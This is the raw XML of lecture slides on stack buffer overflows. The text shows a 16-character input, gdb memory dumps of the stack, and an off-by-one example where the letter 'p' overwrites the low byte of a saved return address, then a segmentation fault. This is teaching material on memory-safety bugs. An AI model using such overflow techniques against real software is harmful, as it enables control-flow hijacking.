          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974939" y="5053898"/>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113" name="Elbow Connector 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D4F4AF-B87A-C648-B20B-A4099FA6E81C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="111" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4061003" y="4728429"/>
            <a:ext cx="109408" cy="2567213"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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1798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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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17"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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19"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="119"/>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20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0"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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="111"/>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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="121"/>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randombar(vertical)">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7" grpId="0" animBg="1"/>
      <p:bldP spid="117" grpId="1" animBg="1"/>
      <p:bldP spid="120" grpId="0"/>
      <p:bldP spid="120" grpId="1"/>
      <p:bldP spid="121" grpId="0"/>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Off-by-one error</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14</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Rounded Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0492B9F5-CAF2-F04D-8FDF-41C75D477441}"/>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0x70	0x06	0x40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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281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Maximum error w/o side-effect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15</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9" y="1881688"/>
            <a:ext cx="4203702"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abcdefghijklmno</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abcdefghijklmno</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6E</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'n'</a:t>
                </a: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6D</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'m'</a:t>
                </a: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6B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'k'</a:t>
                </a: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6A</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'j'</a:t>
                </a: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69</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>i</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</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Rounded Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66409F3E-11B9-E548-9CDB-6D3ABCCA63B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0x69	0x6a	0x6b	0x6c	0x6d	0x6e	0x6f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0x48	0x06	0x40	0x00	0x00	0x00	0x00	0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352463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208348C7-5369-534E-A0FE-48EDD47919FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253463" y="4772051"/>
            <a:ext cx="6591953" cy="113359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703388" algn="l"/>
                <a:tab pos="2278063" algn="l"/>
                <a:tab pos="2854325" algn="l"/>
                <a:tab pos="3417888" algn="l"/>
                <a:tab pos="3994150" algn="l"/>
                <a:tab pos="4568825" algn="l"/>
                <a:tab pos="5133975" algn="l"/>
                <a:tab pos="5708650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) x/32xb $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRP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0x7fffffffdff0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00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0x7fffffffdff8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:	0x61	0x62	0x63	0x64	0x65	0x66	0x67	0x68</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0x7fffffffe000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:	0x69	0x6a	0x6b	0x6c	0x6d	0x6e	0x6f	0x70</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1703388" algn="l"/>
                <a:tab pos="2278063" algn="l"/>
                <a:tab pos="2854325" algn="l"/>
                <a:tab pos="3417888" algn="l"/>
                <a:tab pos="3994150" algn="l"/>
                <a:tab pos="4568825" algn="l"/>
                <a:tab pos="5133975" algn="l"/>
                <a:tab pos="5708650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="162AFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7fffffffe008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:	0x00	0x06	0x40	0x00	0x00	0x00	0x00	0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Example Vulnerability:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Affecting Control 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pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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31" name="Rounded Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3192623-E0EA-A647-96F9-1C473829E4EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="1881688"/>
            <a:ext cx="4305301"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abcdefghijklmnop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghijklmnop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Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80815940-AD54-FA49-BB7A-8360D4C98A7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5915978" y="1509309"/>
            <a:ext cx="4830980" cy="3182353"/>
            <a:chOff x="6512878" y="1197691"/>
            <a:chExt cx="4830980" cy="3182353"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACCD8F1-89A5-8547-A5D7-79CF8362CF45}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="2787821"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Rectangle 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7FC940-76FD-D44A-8D8B-F61B46CC8CB9}"/>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51" name="Rectangle 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF75388A-EBD6-BD4A-B263-38081461F1B1}"/>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52" name="Rectangle 51">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{768F5AFD-267C-6640-9ECB-EA51158203C4}"/>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53" name="Rectangle 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA297A2-68F4-C240-B89E-F6F56A566771}"/>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4" name="Rectangle 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B49003B-44B2-3B47-BE0B-23F21A96459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55" name="Rectangle 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69B3430B-B960-6943-860D-9BD06A6B081E}"/>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56" name="Rectangle 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB1BE46-4195-8841-850A-960472894043}"/>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57" name="Rectangle 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD6883E-638C-BE48-AB4C-950FE64571E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68" name="Group 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD5A138-F4FD-9F42-BE0F-02E66A4B8FA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="3586038"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Rectangle 69">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93114348-F1F5-454A-97A8-C98FCFFDBC1D}"/>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B4F6B4A6-1010-8C42-9530-E8EA50CE0DC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7F5978EC-5803-2349-955B-5362A76B5A1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FE3682EE-99E1-914E-B47C-7D6035C4B9E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3A6F9A2D-99B5-A94C-AC73-8764359DA3A7}"/>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5" name="Rectangle 74">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1180AD8-DC39-9041-B0CD-19C2E1515E97}"/>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6" name="Rectangle 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E017871D-7E2C-4041-9D45-517E9245383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77" name="Rectangle 76">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CCE2CD-1B3B-584E-8A87-30936AADEBE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78" name="Group 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74BB9C4-4E0B-244B-97FE-3E9621A1F014}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1993802"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="80" name="Rectangle 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A76C54E-A643-A947-881C-FFC93CFE4BDA}"/>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70</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'p'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="81" name="Rectangle 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33D3B36-527E-6140-8201-EAD2A7B03A7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sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="Rectangle 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5160F914-F679-0F4B-8636-0DAE9AF1CEC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6E</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'n'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="83" name="Rectangle 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CEC47B1-0E57-F240-9978-8EEA3C0115A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6D</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'m'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Rectangle 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BFCF53E-988D-8B4D-83B2-A888593E4D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85" name="Rectangle 84">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD0231E5-8A87-0847-A999-8BFC6F16C3A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6B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'k'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="86" name="Rectangle 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4274A4B0-F1E6-6A4A-BA2A-699BBE3FC9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6A</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'j'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="87" name="Rectangle 86">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9354028-F3A3-CC47-A6AC-A7F1072C7563}"/>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69</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>i</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="88" name="Group 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC21ED99-4E8B-7746-872B-DF236C6D6C0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1197691"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="90" name="Rectangle 89">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBDA8F50-F8B5-684F-9783-5176AF316374}"/>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1" name="Rectangle 90">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD0BB7C8-39BF-3B4C-98D6-D41DD53564D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2" name="Rectangle 91">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B99B672-CEF7-5E4D-9E16-D0F0DF480245}"/>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3" name="Rectangle 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF0C5A5-B486-B844-AC92-318A44760843}"/>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4" name="Rectangle 93">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E55C8D-0B1E-CF4B-8F20-FEFE4CA70903}"/>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95" name="Rectangle 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{777AEECA-9738-A74B-A106-A153B4D9FB37}"/>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96" name="Rectangle 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D40EF3-82AC-DA4F-AD52-DC05A7B31E1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97" name="Rectangle 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3978679E-C053-784B-BB95-CD1BF311E70E}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E1C0669-CC32-E845-BE6E-141845190DE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11018537" y="4109982"/>
            <a:ext cx="637547" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
